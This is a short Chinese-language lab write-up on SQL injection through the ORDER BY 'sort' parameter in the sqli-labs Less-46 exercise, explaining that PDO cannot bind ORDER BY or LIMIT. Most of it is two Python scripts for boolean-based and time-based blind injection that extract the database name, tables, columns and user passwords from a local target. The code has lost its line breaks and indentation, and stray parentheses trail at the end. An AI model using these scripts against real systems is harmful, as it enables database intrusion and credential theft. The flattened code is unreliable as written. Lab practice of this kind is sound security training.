pdo防御下,order by、limit不能参数绑定,可以进行sql注入
案例:靶场的less-46
布尔盲注:
import requests
from lxml import htmldef get_id_one(URL, paload):res = requests.get(url=URL, params=paload)tree = html.fromstring(res.content)id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()return id_onedef get_database(URL):s = ""for i in range(1, 10):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr(database(),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s += chr(mid)print("数据库名称:" + s)def get_table(URL):s = ""for i in range(1, 32):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s += chr(mid)print("表的名称:" + s)def get_column(URL):s = ""for i in range(1, 32):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s += chr(mid)print("列的名称:" + s)def get_result(URl):s = ""for i in range(1, 32):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s += chr(mid)print("用户名及密码信息:" + s)if __name__ == '__main__':URL = "http://localhost/Less-46/"# get_database(URL)# get_table(URL)# get_column(URL)get_result(URL) 
时间盲注:
import requests
import datetimedef get_database(URL):s = ""for i in range(1, 10):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr(database(),{i},1))>{mid}),sleep(0.2),id) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2# print(chr(mid), mid)s += chr(mid)print("数据库名称:" + s)def get_table(URL):s = ""for i in range(1, 32):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s += chr(mid)print("表的名称:" + s)def get_column(URL):s = ""for i in range(1, 32):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s += chr(mid)print("列的名称:" + s)def get_result(URl):s = ""for i in range(1, 32):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),id) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=paload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2s += chr(mid)print("用户名及密码信息:" + s)if __name__ == '__main__':URL = "http://localhost/Less-46/"# get_database(URL)# get_table(URL)# get_column(URL)get_result(URL)
)
)
)
